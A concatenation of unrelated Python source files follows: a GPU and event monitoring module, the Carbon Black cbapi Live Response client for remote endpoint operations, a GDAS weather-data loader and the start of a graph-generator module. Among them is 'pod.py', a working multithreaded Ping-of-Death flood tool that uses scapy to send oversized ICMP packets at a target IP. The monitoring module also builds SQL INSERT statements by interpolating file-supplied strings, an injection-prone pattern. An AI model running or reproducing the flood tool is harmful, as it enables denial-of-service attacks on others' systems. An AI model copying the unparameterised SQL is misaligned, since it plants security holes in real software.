self.desc = desc
self.model = model
self.timestamp = time.time()
def dump(event):
path = os.path.join(EVENTS_FOLDER, f"{event.timestamp}.json")
with open(path, 'w') as outfile:
json.dump(event.__dict__, outfile)
def add_events_to_db():
database = get_db()
for filename in os.listdir(EVENTS_FOLDER):
if filename.endswith(".json"):
full_path = os.path.join(EVENTS_FOLDER, filename)
with open(full_path) as json_file:
event = json.load(json_file)
query = (f"INSERT INTO events VALUES (" \
f"{event['timestamp']}, " \
f"'{event['desc']}', " \
f"{event['model']})")
database.execute(query)
database.commit()
elif not filename.endswith('.gitkeep'):
raise RuntimeWarning(f"Unknown file ending {filename}")
def get_gpu_observer(database):
def add_gpu_state_to_db(state: systemmonitor.DeviceState) -> None:
database.execute((f"INSERT INTO gpu VALUES ("
f"{state.mean_time}, "
f"{state.index}, "
f"'{state.uuid}', "
f"{state.gpu_util}, "
f"{state.mem_used}, "
f"{state.mem_util}, "
f"{state.temp})"))
database.commit()
return add_gpu_state_to_db
def record():
db = get_db()
systemmonitor.run([get_gpu_observer(db)], average_window_sec=60)
class BackgroundMonitoring(object):
def __init__(self):
thread = threading.Thread(target=record, args=())
thread.daemon = True
thread.start()
self.thread = thread
def stop(self):
systemmonitor.exit_event.set()
print("Gave monitoring exit signal. Waiting for thread to join.")
self.thread.join()
print("Background Monitoring Thread joined")
|
live_response_api.py
|
from __future__ import absolute_import
import random
import string
import threading
import time
import logging
from collections import defaultdict
import shutil
from cbapi.errors import TimeoutError, ObjectNotFoundError, ApiError, ServerError
from six import itervalues
from concurrent.futures import ThreadPoolExecutor, as_completed, _base, wait
from cbapi import winerror
from six.moves.queue import Queue
from cbapi.response.models import Sensor
log = logging.getLogger(__name__)
class LiveResponseError(Exception):
def __init__(self, details):
message_list = []
self.details = details
self.win32_error = None
self.decoded_win32_error = ""
# Details object:
# {u'status': u'error', u'username': u'admin', u'sensor_id': 9, u'name': u'kill', u'completion': 1464319733.190924,
# u'object': 1660, u'session_id': 7, u'result_type': u'WinHresult', u'create_time': 1464319733.171967,
# u'result_desc': u'', u'id': 22, u'result_code': 2147942487}
if self.details.get("status") == "error" and self.details.get("result_type") == "WinHresult":
# attempt to decode the win32 error
win32_error_text = "Unknown Win32 error code"
try:
self.win32_error = int(self.details.get("result_code"))
win32_error_text = "Win32 error code 0x%08X" % (self.win32_error,)
self.decoded_win32_error = winerror.decode_hresult(self.win32_error)
if self.decoded_win32_error:
win32_error_text += " ({0})".format(self.decoded_win32_error)
except:
pass
finally:
message_list.append(win32_error_text)
self.message = ": ".join(message_list)
def __str__(self):
return self.message
class LiveResponseSession(object):
MAX_RETRY_COUNT = 5
def __init__(self, scheduler, session_id, sensor_id, session_data=None):
self.session_id = session_id
self.sensor_id = sensor_id
self._lr_scheduler = scheduler
self._cb = scheduler._cb
# TODO: refcount should be in a different object in the scheduler
self._refcount = 1
self._closed = False
self.session_data = session_data
self.os_type = self._cb.select(Sensor, self.sensor_id).os_type
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def close(self):
self._lr_scheduler.close_session(self.sensor_id, self.session_id)
self._closed = True
def get_session_archive(self):
response = self._cb.session.get("/api/v1/cblr/session/{0}/archive".format(self.session_id), stream=True)
response.raw.decode_content = True
return response.raw
#
# File operations
#
def get_raw_file(self, file_name, timeout=None, delay=None):
data = {"name": "get file", "object": file_name}
resp = self._lr_post_command(data).json()
file_id = resp.get('file_id', None)
command_id = resp.get('id', None)
self._poll_command(command_id, timeout=timeout, delay=delay)
response = self._cb.session.get("/api/v1/cblr/session/{0}/file/{1}/content".format(self.session_id,
file_id), stream=True)
response.raw.decode_content = True
return response.raw
def get_file(self, file_name):
"""
Retrieve contents of the specified file name
:param str file_name: Name of the file
:return: Content of the specified file name
:rtype: str
"""
fp = self.get_raw_file(file_name)
content = fp.read()
fp.close()
return content
def delete_file(self, filename):
"""
Delete the specified file name
:param str filename: Name of the file
:return: None
"""
data = {"name": "delete file", "object": filename}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def put_file(self, infp, remote_filename):
"""
Create a new file on the remote endpoint with the specified data
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... lr_session.put_file('File Data', new_remote_file)
:param str infp: File data to put on the remote endpoint
:param str remote_filename: File name to create on the remote endpoint
:return: None
"""
data = {"name": "put file", "object": remote_filename}
file_id = self._upload_file(infp)
data["file_id"] = file_id
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def list_directory(self, dir_name):
"""
List the contents of a directory
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... pprint.pprint(lr_session.list_directory('C:\\\\temp\\\\'))
[{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'.',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'DIRECTORY'],
u'create_time': 1471897244,
u'filename': u'..',
u'last_access_time': 1476390670,
u'last_write_time': 1476390670,
u'size': 0},
{u'attributes': [u'ARCHIVE'],
u'create_time': 1476390668,
u'filename': u'test.txt',
u'last_access_time': 1476390668,
u'last_write_time': 1476390668,
u'size': 0}]
:param str dir_name: Directory to list. This parameter should end with '\'
:return: Returns a directory listing
:rtype: list
"""
data = {"name": "directory list", "object": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get("id")
return self._poll_command(command_id).get("files", [])
def create_directory(self, dir_name):
"""
Create a directory on the remote endpoint
:param str dir_name: New directory name
:return: None
"""
data = {"name": "create directory", "object": dir_name}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def path_join(self, *dirnames):
if self.os_type == 1:
# Windows
return "\\".join(dirnames)
else:
# Unix/Mac OS X
return "/".join(dirnames)
def path_islink(self, fi):
# TODO: implement
return False
def walk(self, top, topdown=True, onerror=None, followlinks=False):
"""
Perform a full directory walk with recursion into subdirectories
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... for entry in lr_session.walk(directory_name):
... print(entry)
('C:\\temp\\', [u'dir1', u'dir2'], [u'file1.txt'])
:param str top: Directory to recurse
:param bool topdown: if True, start output from top level directory
:param bool onerror: Callback if an error occurs.
This function is called with one argument (the exception that occurred)
:param bool followlinks: Follow symbolic links
:return: Returns output in the follow tuple format: (Directory Name, [dirnames], [filenames])
:rtype: tuple
"""
try:
allfiles = self.list_directory(self.path_join(top, "*"))
except Exception as err:
if onerror is not None:
onerror(err)
return
dirnames = []
filenames = []
for fn in allfiles:
if "DIRECTORY" in fn["attributes"]:
if fn["filename"] not in (".", ".."):
dirnames.append(fn)
else:
filenames.append(fn)
if topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
for name in dirnames:
new_path = self.path_join(top, name["filename"])
if followlinks or not self.path_islink(new_path):
for x in self.walk(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, [fn["filename"] for fn in dirnames], [fn["filename"] for fn in filenames]
#
# Process operations
#
def kill_process(self, pid):
"""
Terminate a process on the remote endpoint
:param pid: Process ID to terminate
:return: True if success, False if failure
:rtype: bool
"""
data = {"name": "kill", "object": pid}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
try:
self._poll_command(command_id, timeout=10, delay=0.1)
except TimeoutError:
return False
return True
def create_process(self, command_string, wait_for_output=True, remote_output_file_name=None,
working_directory=None, wait_timeout=30):
"""
Create a new process with the specified command string.
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... print(lr_session.create_process(r'cmd.exe /c "ping.exe 192.168.1.1"'))
Pinging 192.168.1.1 with 32 bytes of data:
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
:param str command_string: command string used for the create process operation
:param bool wait_for_output: Block on output from the new process
:param str remote_output_file_name: The remote output file name used for process output
:param str working_directory: The working directory of the create process operation
:param int wait_timeout: Time out used for this live response command
:return: returns the output of the command string
:rtype: str
"""
# process is:
# - create a temporary file name
# - create the process, writing output to a temporary file
# - wait for the process to complete
# - get the temporary file from the endpoint
# - delete the temporary file
data = {"name": "create process", "object": command_string, "wait": False}
if wait_for_output and not remote_output_file_name:
randfilename = self._random_file_name()
data["output_file"] = randfilename
if working_directory:
data["working_directory"] = working_directory
if remote_output_file_name:
data["output_file"] = remote_output_file_name
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if wait_for_output:
self._poll_command(command_id, timeout=wait_timeout)
# now the file is ready to be read
file_content = self.get_file(data["output_file"])
# delete the file
self._lr_post_command({"name": "delete file", "object": data["output_file"]})
return file_content
def list_processes(self):
"""
List currently running processes
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... print(lr_session.list_processes()[0])
{u'command_line': u'',
u'create_time': 1476260500,
u'parent': 0,
u'parent_guid': u'00000001-0000-0000-0000-000000000000',
u'path': u'',
u'pid': 4,
u'proc_guid': u'00000001-0000-0004-01d2-2461a85e4546',
u'sid': u's-1-5-18',
u'username': u'NT AUTHORITY\\SYSTEM'}
:return: returns a list of running processes
:rtype: list
"""
data = {"name": "process list"}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("processes", [])
#
# Registry operations
#
# returns dictionary with 2 entries ("values" and "sub_keys")
# "values" is a list containing a dictionary for each registry value in the key
# "sub_keys" is a list containing one entry for each sub_key
def list_registry_keys_and_values(self, regkey):
"""
Enumerate subkeys and values of the specified registry key.
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.list_registry_keys_and_values('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI'))
{'sub_keys': [u'Parameters', u'Enum'],
'values': [{u'value_data': 0,
u'value_name': u'Start',
u'value_type': u'REG_DWORD'},
{u'value_data': 1,
u'value_name': u'Type',
u'value_type': u'REG_DWORD'},
{u'value_data': 3,
u'value_name': u'ErrorControl',
u'value_type': u'REG_DWORD'},
{u'value_data': u'system32\\drivers\\ACPI.sys',
u'value_name': u'ImagePath',
u'value_type': u'REG_EXPAND_SZ'},
{u'value_data': u'Microsoft ACPI Driver',
u'value_name': u'DisplayName',
u'value_type': u'REG_SZ'},
{u'value_data': u'Boot Bus Extender',
u'value_name': u'Group',
u'value_type': u'REG_SZ'},
{u'value_data': u'acpi.inf_x86_neutral_ddd3c514822f1b21',
u'value_name': u'DriverPackageId',
u'value_type': u'REG_SZ'},
{u'value_data': 1,
u'value_name': u'Tag',
u'value_type': u'REG_DWORD'}]}
:param str regkey: The registry key to enumerate
:return: returns a dictionary with 2 keys (sub_keys and values)
:rtype: dict
"""
data = {"name": "reg enum key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
results = {}
results["values"] = self._poll_command(command_id).get("values", [])
results["sub_keys"] = self._poll_command(command_id).get("sub_keys", [])
return results
# returns a list containing a dictionary for each registry value in the key
def list_registry_keys(self, regkey):
"""
Enumerate all registry values from the specified registry key.
:param regkey: The registry key to enumearte
:return: returns a list of values
:rtype: list
"""
data = {"name": "reg enum key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("values", [])
# returns a dictionary with the registry value
def get_registry_value(self, regkey):
"""
Returns the associated value of the specified registry key
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
>>> pprint.pprint(lr_session.get_registry_value('HKLM\\SYSTEM\\CurrentControlSet\\services\\ACPI\\Start'))
{u'value_data': 0, u'value_name': u'Start', u'value_type': u'REG_DWORD'}
:param str regkey: The registry key to retrieve
:return: Returns a dictionary with keys of: value_data, value_name, value_type
:rtype: dict
"""
data = {"name": "reg query value", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
return self._poll_command(command_id).get("value", {})
def set_registry_value(self, regkey, value, overwrite=True, value_type=None):
"""
Set a registry value of the specified registry key
:Example:
>>> with c.select(Sensor, 1).lr_session() as lr_session:
... lr_session.set_registry_value('HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\ACPI\\\\testvalue', 1)
:param str regkey: They registry key to set
:param obj value: The value data
:param bool overwrite: Overwrite value if True
:param str value_type: The type of value. Examples: REG_DWORD, REG_MULTI_SZ, REG_SZ
:return: None
"""
if value_type is None:
if type(value) == int:
value_type = "REG_DWORD"
elif type(value) == list:
value_type = "REG_MULTI_SZ"
# elif type(value) == bytes:
# value_type = "REG_BINARY"
else:
value_type = "REG_SZ"
value = str(value)
data = {"name": "reg set value", "object": regkey, "overwrite": overwrite, "value_type": value_type,
"value_data": value}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def create_registry_key(self, regkey):
"""
Create a new registry
:param str regkey: The registry key to create
:return: None
"""
data = {"name": "reg create key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def delete_registry_key(self, regkey):
"""
Delete a registry key
:param str regkey: The registry key to delete
:return: None
"""
data = {"name": "reg delete key", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
def delete_registry_value(self, regkey):
"""
Delete a registry value
:param str regkey: the registry value to delete
:return: None
"""
data = {"name": "reg delete value", "object": regkey}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
self._poll_command(command_id)
#
# Physical memory capture
#
def memdump(self, local_filename, remote_filename=None, compress=True):
dump_object = self.start_memdump(remote_filename=remote_filename, compress=compress)
dump_object.wait()
dump_object.get(local_filename)
dump_object.delete()
def start_memdump(self, remote_filename=None, compress=True):
if not remote_filename:
remote_filename = self._random_file_name()
data = {"name": "memdump", "object": remote_filename, "compress": compress}
resp = self._lr_post_command(data).json()
command_id = resp.get('id')
if compress:
remote_filename += ".zip"
return LiveResponseMemdump(self, command_id, remote_filename)
def _random_file_name(self):
randfile = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(12)])
if self.os_type == 1:
workdir = 'c:\\windows\\carbonblack'
else:
workdir = '/tmp'
return self.path_join(workdir, 'cblr.%s.tmp' % (randfile,))
def _poll_command(self, command_id, **kwargs):
return poll_status(self._cb, "/api/v1/cblr/session/{0}/command/{1}".format(self.session_id, command_id),
**kwargs)
def _upload_file(self, fp):
resp = self._cb.session.post("/api/v1/cblr/session/{0}/file".format(self.session_id), files={"file": fp}).json()
return resp.get('id')
def _lr_post_command(self, data):
retries = self.MAX_RETRY_COUNT
if "name" in data and data["name"] not in self.session_data["supported_commands"]:
raise ApiError("Command {0} not supported by this sensor".format(data["name"]))
while retries:
try:
data["session_id"] = self.session_id
resp = self._cb.post_object("/api/v1/cblr/session/{0}/command".format(self.session_id), data)
except ObjectNotFoundError as e:
if e.message.startswith("Sensor") or e.message.startswith("Session"):
self.session_id, self.session_data = self._lr_scheduler._get_or_create_session(self.sensor_id)
retries -= 1
continue
else:
raise ApiError("Received 404 error from server: {0}".format(e.message))
else:
return resp
raise TimeoutError(message="Command {0} failed after {1} retries".format(data["name"], self.MAX_RETRY_COUNT))
class LiveResponseMemdump(object):
def __init__(self, lr_session, memdump_id, remote_filename):
self.lr_session = lr_session
self.memdump_id = memdump_id
self.remote_filename = remote_filename
self._done = False
self._error = None
def get(self, local_filename):
if not self._done:
self.wait()
if self._error:
raise self._error
src = self.lr_session.get_raw_file(self.remote_filename, timeout=3600, delay=5)
dst = open(local_filename, "wb")
shutil.copyfileobj(src, dst)
def wait(self):
self.lr_session._poll_command(self.memdump_id, timeout=3600, delay=5)
self._done = True
def delete(self):
self.lr_session.delete_file(self.remote_filename)
def jobrunner(callable, cb, sensor_id):
with cb.select(Sensor, sensor_id).lr_session() as sess:
return callable(sess)
class WorkItem(object):
def __init__(self, fn, sensor_id):
self.fn = fn
if isinstance(sensor_id, Sensor):
self.sensor_id = sensor_id.id
else:
self.sensor_id = int(sensor_id)
self.future = _base.Future()
class CompletionNotification(object):
def __init__(self, sensor_id):
self.sensor_id = sensor_id
class WorkerStatus(object):
def __init__(self, sensor_id, status="ready", exception=None):
self.sensor_id = sensor_id
self.status = status
self.exception = exception
class JobWorker(threading.Thread):
def __init__(self, cb, sensor_id, result_queue):
super(JobWorker, self).__init__()
self.cb = cb
self.sensor_id = sensor_id
self.job_queue = Queue()
self.lr_session = None
self.result_queue = result_queue
def run(self):
try:
self.lr_session = self.cb.live_response.request_session(self.sensor_id)
self.result_queue.put(WorkerStatus(self.sensor_id, status="ready"))
while True:
work_item = self.job_queue.get(block=True)
if not work_item:
self.job_queue.task_done()
return
self.run_job(work_item)
self.result_queue.put(CompletionNotification(self.sensor_id))
self.job_queue.task_done()
except Exception as e:
self.result_queue.put(WorkerStatus(self.sensor_id, status="error", exception=e))
finally:
if self.lr_session:
self.lr_session.close()
self.result_queue.put(WorkerStatus(self.sensor_id, status="exiting"))
def run_job(self, work_item):
try:
work_item.future.set_result(work_item.fn(self.lr_session))
except Exception as e:
work_item.future.set_exception(e)
class LiveResponseJobScheduler(threading.Thread):
daemon = True
def __init__(self, cb, max_workers=10):
super(LiveResponseJobScheduler, self).__init__()
self._cb = cb
self._job_workers = {}
self._idle_workers = set()
self._unscheduled_jobs = defaultdict(list)
self._max_workers = max_workers
self.schedule_queue = Queue()
def run(self):
log.debug("Starting Live Response Job Scheduler")
while True:
log.debug("Waiting for item on Scheduler Queue")
item = self.schedule_queue.get(block=True)
log.debug("Got item: {0}".format(item))
if isinstance(item, WorkItem):
# new WorkItem available
self._unscheduled_jobs[item.sensor_id].append(item)
elif isinstance(item, CompletionNotification):
# job completed
self._idle_workers.add(item.sensor_id)
elif isinstance(item, WorkerStatus):
if item.status == "error":
log.error("Error encountered by JobWorker[{0}]: {1}".format(item.sensor_id,
item.exception))
elif item.status == "exiting":
log.debug("JobWorker[{0}] has exited, waiting...".format(item.sensor_id))
self._job_workers[item.sensor_id].join()
log.debug("JobWorker[{0}] deleted".format(item.sensor_id))
del self._job_workers[item.sensor_id]
try:
self._idle_workers.remove(item.sensor_id)
except KeyError:
pass
elif item.status == "ready":
log.debug("JobWorker[{0}] now ready to accept jobs, session established".format(item.sensor_id))
self._idle_workers.add(item.sensor_id)
else:
log.debug("Unknown status from JobWorker[{0}]: {1}".format(item.sensor_id, item.status))
else:
log.debug("Received unknown item on the scheduler Queue, exiting")
# exiting the scheduler if we get None
# TODO: wait for all worker threads to exit
return
self._schedule_jobs()
def _schedule_jobs(self):
log.debug("Entering scheduler")
# First, see if there are new jobs to schedule on idle workers.
self._schedule_existing_workers()
# If we have jobs scheduled to run on sensors with no current associated worker, let's spawn new ones.
if set(self._unscheduled_jobs.keys()) - self._idle_workers:
self._cleanup_idle_workers()
self._spawn_new_workers()
self._schedule_existing_workers()
def _cleanup_idle_workers(self, max=None):
if not max:
max = self._max_workers
for sensor in list(self._idle_workers)[:max]:
log.debug("asking worker for sensor id {0} to exit".format(sensor))
self._job_workers[sensor].job_queue.put(None)
def _schedule_existing_workers(self):
log.debug("There are idle workers for sensor ids {0}".format(self._idle_workers))
intersection = self._idle_workers.intersection(set(self._unscheduled_jobs.keys()))
log.debug("{0} jobs ready to execute in existing execution slots".format(len(intersection)))
for sensor in intersection:
item = self._unscheduled_jobs[sensor].pop(0)
self._job_workers[sensor].job_queue.put(item)
self._idle_workers.remove(item.sensor_id)
self._cleanup_unscheduled_jobs()
def _cleanup_unscheduled_jobs(self):
marked_for_deletion = []
for k in self._unscheduled_jobs.keys():
if len(self._unscheduled_jobs[k]) == 0:
marked_for_deletion.append(k)
for k in marked_for_deletion:
del self._unscheduled_jobs[k]
def submit_job(self, work_item):
self.schedule_queue.put(work_item)
def _spawn_new_workers(self):
if len(self._job_workers) >= self._max_workers:
return
schedule_max = self._max_workers - len(self._job_workers)
sensors = [s for s in self._cb.select(Sensor) if s.id in self._unscheduled_jobs
and s.id not in self._job_workers
and s.status == "Online"]
sensors_to_schedule = sorted(sensors, key=lambda x: x.next_checkin_time)[:schedule_max]
log.debug("Spawning new workers to handle these sensors: {0}".format(sensors_to_schedule))
for sensor in sensors_to_schedule:
log.debug("Spawning new JobWorker for sensor id {0}".format(sensor.id))
self._job_workers[sensor.id] = JobWorker(self._cb, sensor.id, self.schedule_queue)
self._job_workers[sensor.id].start()
class LiveResponseSessionManager(object):
def __init__(self, cb, timeout=30, keepalive_sessions=False):
self._timeout = timeout
self._cb = cb
self._sessions = {}
self._session_lock = threading.RLock()
self._keepalive_sessions = keepalive_sessions
if keepalive_sessions:
self._cleanup_thread = threading.Thread(target=self._session_keepalive_thread)
self._cleanup_thread.daemon = True
self._cleanup_thread.start()
self._job_scheduler = None
def submit_job(self, job, sensor):
if self._job_scheduler is None:
# spawn the scheduler thread
self._job_scheduler = LiveResponseJobScheduler(self._cb)
self._job_scheduler.start()
work_item = WorkItem(job, sensor)
self._job_scheduler.submit_job(work_item)
return work_item.future
def _session_keepalive_thread(self):
log.debug("Starting Live Response scheduler cleanup task")
while True:
time.sleep(self._timeout)
delete_list = []
with self._session_lock:
for session in itervalues(self._sessions):
if session._refcount == 0:
delete_list.append(session.sensor_id)
else:
try:
self._send_keepalive(session.session_id)
except ObjectNotFoundError:
log.debug("Session {0} for sensor {1} not valid any longer, removing from cache"
.format(session.session_id, session.sensor_id))
delete_list.append(session.sensor_id)
except:
log.debug("Keepalive on session {0} (sensor {1}) failed with unknown error, removing from cache"
.format(session.session_id, session.sensor_id))
delete_list.append(session.sensor_id)
for sensor_id in delete_list:
self._close_session(self._sessions[sensor_id].session_id)
del self._sessions[sensor_id]
def request_session(self, sensor_id):
if self._keepalive_sessions:
with self._session_lock:
if sensor_id in self._sessions:
session = self._sessions[sensor_id]
self._sessions[sensor_id]._refcount += 1
else:
session_id, session_data = self._get_or_create_session(sensor_id)
session = LiveResponseSession(self, session_id, sensor_id, session_data=session_data)
self._sessions[sensor_id] = session
else:
session_id, session_data = self._get_or_create_session(sensor_id)
session = LiveResponseSession(self, session_id, sensor_id, session_data=session_data)
return session
def close_session(self, sensor_id, session_id):
if self._keepalive_sessions:
with self._session_lock:
try:
self._sessions[sensor_id]._refcount -= 1
except KeyError:
pass
else:
self._close_session(session_id)
def _send_keepalive(self, session_id):
log.debug("Sending keepalive message for session id {0}".format(session_id))
self._cb.get_object("/api/v1/cblr/session/{0}/keepalive".format(session_id))
def _get_or_create_session(self, sensor_id):
sensor_sessions = [s for s in self._cb.get_object("/api/v1/cblr/session")
if s["sensor_id"] == sensor_id and s["status"] in ("pending", "active")]
if len(sensor_sessions) > 0:
session_id = sensor_sessions[0]["id"]
else:
session_id = self._create_session(sensor_id)
try:
res = poll_status(self._cb, "/api/v1/cblr/session/{0}".format(session_id), desired_status="active")
except ObjectNotFoundError:
# the Cb server will return a 404 if we don't establish a session in time, so convert this to a "timeout"
raise TimeoutError(uri="/api/v1/cblr/session/{0}".format(session_id),
message="Could not establish session with sensor {0}".format(sensor_id),
error_code=404)
else:
return session_id, res
def _close_session(self, session_id):
try:
session_data = self._cb.get_object("/api/v1/cblr/session/{0}".format(session_id))
session_data["status"] = "close"
self._cb.put_object("/api/v1/cblr/session/{0}".format(session_id), session_data)
except:
pass
def _create_session(self, sensor_id):
response = self._cb.post_object("/api/v1/cblr/session", {"sensor_id": sensor_id}).json()
session_id = response["id"]
return session_id
class GetFileJob(object):
def __init__(self, file_name):
self._file_name = file_name
def run(self, session):
return session.get_file(self._file_name)
# TODO: adjust the polling interval and also provide a callback function to report progress
def poll_status(cb, url, desired_status="complete", timeout=None, delay=None):
start_time = time.time()
status = None
if not timeout:
timeout = 120
if not delay:
delay = 0.5
while status != desired_status and time.time() - start_time < timeout:
res = cb.get_object(url)
if res["status"] == desired_status:
return res
elif res["status"] == "error":
raise LiveResponseError(res)
else:
time.sleep(delay)
raise TimeoutError(uri=url, message="timeout polling for Live Response")
if __name__ == "__main__":
from cbapi.response import CbEnterpriseResponseAPI
import logging
root = logging.getLogger()
root.addHandler(logging.StreamHandler())
logging.getLogger("cbapi").setLevel(logging.DEBUG)
c = CbEnterpriseResponseAPI()
j = GetFileJob(r"c:\test.txt")
with c.select(Sensor, 3).lr_session() as lr_session:
file_contents = lr_session.get_file(r"c:\test.txt")
future = c.live_response.submit_job(j.run, 3)
wait([future, ])
print(future.result())
|
load_complete_data.py
|
import os
import src.mongoDBI as mongoDBI
import src.constants as constants
import src.utils as utils
import glob
import src.parse_grb_files as parse_grb_files
from multiprocessing import Process
from datetime import datetime, timedelta, date
# ---------------------------------------- #
class buffer:
buffer = None
max_buffer_count = 25
dbi = None
def __init__(self , db_name ):
self.dbi = mongoDBI.mongoDBI ( db_name )
self.buffer = {}
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
def insert_to_buffer(self, table, dict):
self.buffer[ table ].append (dict)
return
def write_buffer(self):
cur_len = len (self.buffer[ constants.mongo_db_tables[ 0 ] ])
if cur_len < self.max_buffer_count:
return;
self.dbi.insert_bulk (self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
return
# data_map : dictionary
# 1st entry is the date or year_week id
def insert_to_db(self, data_map, label=constants.label_date):
if data_map is None or len(data_map) == 0 :
return
id = data_map[ label ]
data_map.pop (label, None)
for table, data in data_map.iteritems ():
# print 'in insert to db... table:'+table
key_label = label
key_contents = id
value_label = constants.label_value
value_contents = data
dict = mongoDBI.mongoDBI.get_insert_dict (key_label, key_contents, value_label, value_contents)
self.insert_to_buffer (table, dict)
self.write_buffer ()
return;
def flush(self):
self.dbi.insert_bulk (self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[ t ] = [ ]
return
# ------------------------ END OF CLASS ------------------------#
#
# Load complete data for each date into db
# Process complete data (4 per day) of each date, of the given year
#
def process_year_by_date_complete(year):
cur_day = utils.get_current_day ()
cur_year = utils.get_current_year ()
buffer_obj = buffer (constants.db_name_date_complete)
dir = str (year)
if not os.path.exists (dir):
return
os.chdir (dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range (start_day, end_day + 1):
dir = str (day).zfill (3)
if not os.path.exists (dir):
continue
try:
os.chdir (dir)
files = glob.glob ("gdas*z") # get list of data
data = parse_grb_files.parse_files_by_date_complete (files)
for data_element in data:
buffer_obj.insert_to_db (data_element, label=constants.label_date_idx)
os.chdir ("../")
except:
pass
os.chdir ("../")
os.chdir ("../")
buffer_obj.flush ()
# -------------------------------------------- #
def load_by_date_complete():
print ('Current Working directory ', os.getcwd())
cur_year = utils.get_current_year ()
os.chdir (constants.data_dir)
os.chdir (constants.gdas_data_dir)
years = range (constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process (target=process_year_by_date_complete, args=(year,))
process_pool.append (p)
for p in process_pool:
p.start ()
for p in process_pool:
p.join ()
return
load_by_date_complete()
|
pod.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, ICMP, sendp, send, fragment, conf
from threading import Thread
# Import modules for POD flood
import tools.randomData as randomData
def POD_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting POD attack...")
threads_list = []
# POD flood
def pod_flood():
global FINISH
payload = random.choice(list("1234567890qwertyuiopasdfghjklzxcvbnm")) * 60000
packet = IP(dst = target_ip) / ICMP(id = 65535, seq = 65535) / payload
while not FINISH:
for i in range(16):
send(packet, verbose = False)
print("\033[1;32m"+"[+]"+"\033[0m"+" Packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = pod_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" POD attack completed.")
|
graph_gens.py
|
#!/usr/local/bin/python
# coding: utf-8
import os
from time import time
from subprocess import call
import numpy as np
from sklearn.preprocessing import OneHotEncoder
import networkx as nx
import scipy
from scipy import special
from numpy import pi
import itertools
from gemben.utils import graph_util,kronecker_generator,kronecker_init_matrix
import math
import multiprocessing
def truncate(f, n):
"""Function to truncate the given floating point values."""
return math.floor(f * 10 ** n) / 10 ** n
def plot_hist(title, data):
"""Function to truncate the given floating point values."""
import matplotlib.pyplot as plt
plt.figure()
plt.title(title)
plt.hist(x=data)
plt.savefig(title + '.png')
##########################################################################
def barbell_graph(m1,m2):
"""Function to generate barbell graph.
A n-barbell graph is the simple graph obtained by connecting
two copies of a complete graph K_n by a bridge.
Return the Barbell Graph: two complete graphs connected by a path.
For m1 > 1 and m2 >= 0.
Two identical complete graphs K_{m1} form the left and right bells,
and are connected by a path P_{m2}.
